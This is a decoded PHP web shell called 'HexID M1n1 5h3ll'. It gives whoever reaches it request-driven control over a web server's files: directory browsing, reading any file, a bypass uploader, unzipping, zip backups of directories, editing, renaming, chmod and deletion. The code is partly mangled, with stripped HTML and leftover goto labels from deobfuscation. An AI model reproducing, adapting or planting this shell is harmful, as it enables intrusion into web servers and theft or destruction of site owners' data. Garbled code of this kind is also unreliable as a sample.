/* Decoded by unphp.net */
= strtotime($expired))) { function write($content, $dir) { $fh = fopen($dir, "w"); if (fwrite($fh, $content)) { return "1"; } else { return "0"; } fclose($fh); } function rmdir_recursive($dir) { foreach (scandir($dir) as $file) { if ("." === $file || ".." === $file) { continue; } if (is_dir("{$dir}/{$file}")) { rmdir_recursive("{$dir}/{$file}"); } else { unlink("{$dir}/{$file}"); } } rmdir($dir); } function alert($msg) { print ""; } function kabur($dir) { print ""; } function w($dir, $perm) { if (!is_writable($dir)) { return "Not.Writable"; } else { return "Writable"; } } function r($dir, $perm) { if (!is_writable($dir)) { return "" . $perm . ""; } else { return "" . $perm . ""; } } echo "
\xa
\xa\xa
HexID M1n1 5h3ll MobiLe "; if (isset($_GET["path"])) { $path = $_GET["path"]; chdir($path); } else { $path = getcwd(); } if (isset($_GET["dir"])) { $dir = $_GET["dir"]; chdir($dir); } else { $dir = getcwd(); } echo ""; echo ""; echo "[ Zip Archiver ]"; echo ""; echo "[ Upmod ]"; if (isset($_FILES["file"])) { if (copy($_FILES["file"]["tmp_name"], $path . "/" . $_FILES["file"]["name"])) { $message = "File Upload : Done Successfully"; } else { $message = "Failed Dir Not Writeable :("; } } echo " | |
"; echo "
\xa
"; $path = str_replace("\", "/", $path); $paths = explode("/", $path); foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "" . r($dir, Dir) . ":/"; continue; } if ($pat == '') { continue; } echo "" . $pat . "/"; } echo "_[ " . w($dir, $perms) . " ]"; echo "
"; if (isset($_FILES["zip_file"]["name"])) { $filename = $_FILES["zip_file"]["name"]; $source = $_FILES["zip_file"]["tmp_name"]; $type = $_FILES["zip_file"]["type"]; $name = explode(".", $filename); $accepted_types = array("application/zip", "application/x-zip-compressed", "multipart/x-zip", "application/x-compressed"); foreach ($accepted_types as $mime_type) { if ($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == "zip" ? true : false; if (!$continue) { alert("File type cant zip"); kabur("?option&path={$path}&hexid=ziper"); } $pathx = $path . "/"; $filenoext = basename($filename, ".zip"); $filenoext = basename($filenoext, ".ZIP"); $targetdir = $pathx . $filenoext; $targetzip = $pathx . $filename; if (is_dir($targetdir)) { rmdir_recursive($targetdir); } if (move_uploaded_file($source, $targetzip)) { $zip = new ZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($pathx); $zip->close(); unlink($targetzip); } $message = "Unzip Succesfully"; } else { $message = "Unzip Failed!!"; } } if ($_GET["upmod"] == "upmenu") { echo "
Special Premium Bypass Uploader He☠id
"; $rootPath = $_SERVER["DOCUMENT_ROOT"]; $thisPath = dirname($_SERVER["PHP_SELF"]); $pathz = str_replace($rootPath, " ", $thisPath); $dir = dirname("mystring/and/path.txt") . DIRECTORY_SEPARATOR; $pathxz = dirname(__FILE__); if ($pathz == '' || $pathz == "/" || $pathz == "\") { } if ($_POST["_upl"] == "Upload") { if (@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { $web = "http://" . $_SERVER["SERVER_NAME"] . $pathxz . "/" . basename($_FILES["file"]["name"]) . ''; echo "Go ➩ {$web}"; echo "
Author : Tex7ure || Hillusion Exploit ID ☠
"; } else { echo "Upload Failed !!!
"; } } } if ($_GET["zip"] == "menu") { echo "
"; } if ($_GET["auto"] == "unzip") { echo "
\xa\xa
[ Auto Unzip File ]
|
"; if ($message) { echo "
[ Back to home ]"; } } if ($_GET["zip"] == "backup") { echo "
\xa
[ Zip Backup ]\xa
"; echo "\xa
|
"; if ($_POST["backup"]) { $save = $_POST["save"]; function Zip($source, $destination) { if (extension_loaded("zip") === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . "/", '', $file . "/")); } else { if (is_file($file) === true) { $zip->addFromString(str_replace($source . "/", '', $file), file_get_contents($file)); } } } } else { if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } } return $zip->close(); } } return false; } Zip($_POST["dir"], $save); echo "Done Succesfully, Save To: {$save}
"; } } if ($_GET["unzip"] == "manual") { echo "
\xa [ UnZip Manual ]
"; echo ""; if ($_POST["extrak"]) { $save = $_POST["save"]; $zip = new ZipArchive(); $res = $zip->open($_POST["dird"]); if ($res === TRUE) { $zip->extractTo($save); $zip->close(); echo " |
Done Succesfully, Location: {$save}
"; } else { echo "
Unzip Failed
"; } } } if (isset($_GET["exit"])) { session_destroy(); alert("Thanks to use my project HexID M1n1 5h3ll Copyright 2019 Tex7ure - Hillusion Exploit ID"); kabur("?home"); } if (isset($_GET["filesrc"])) { echo "
File:"; echo $_GET["filesrc"]; echo "
"; $html = htmlspecialchars(file_get_contents($_GET["filesrc"])); echo ""; } elseif (isset($_GET["option"]) && $_POST["opt"] != "delete") { echo "
" . $_POST["path"] . "
"; if ($_POST["opt"] == "chmod") { if (isset($_POST["perm"])) { if (chmod($_POST["path"], $_POST["perm"])) { alert("Change Permission Success"); } else { alert("Change Permission Failed"); } } echo ""; } elseif ($_POST["opt"] == "rename") { if (isset($_POST["newname"])) { if (rename($_POST["path"], $path . "/" . $_POST["newname"])) { alert("Rename Success"); kabur("?path={$path}"); } else { alert("Rename Failed"); } $_POST["name"] = $_POST["newname"]; } echo ""; } elseif ($_POST["opt"] == "edit") { if (isset($_POST["src"])) { $fp = fopen($_POST["path"], "w"); if (fwrite($fp, $_POST["src"])) { echo ""; echo "Success Edit File "; } else { echo "Failed Edit File
|
"; } fclose($fp); } echo ""; } echo ""; } else { echo "
"; if (isset($_GET["option"]) && $_POST["opt"] == "delete") { if ($_POST["type"] == "dir") { if (rmdir($_POST["path"])) { alert("The directory has been deleted :v"); } else { alert("Directory failed to delete :D"); } } elseif ($_POST["type"] == "file") { if (unlink($_POST["path"])) { alert("The file has been deleted :v"); } else { alert("File failed to delete :D"); } } } echo ""; $scandir = scandir($path); echo ""; } echo "
\xa\xa"; } else { echo "\xa
[!] Warning [!]
"; date_default_timezone_set("Asia/Jakarta"); $anj = date("Y-m-d"); echo "\xa"; echo "\xaYour Access Expired | Date. In : {$anj} |
Regist : {$awal} | Expired : {$expired} |
"; } goto Uogfg; BozPb: $expired = date("2024-01-21"); goto QZTPI; eDE58: error_reporting(0); goto VUOHb; Qvgw3: ZeahE: goto cFKiU; og3XE: l20Ep: goto wZ_nc; KyeiS: MAZ_m: goto pmRhb; Uogfg: goto MAZ_m; goto dd2X3; b7dfR: goto ZeahE; goto IR4it; bq_a0: goto dMZLI; goto efDM ?>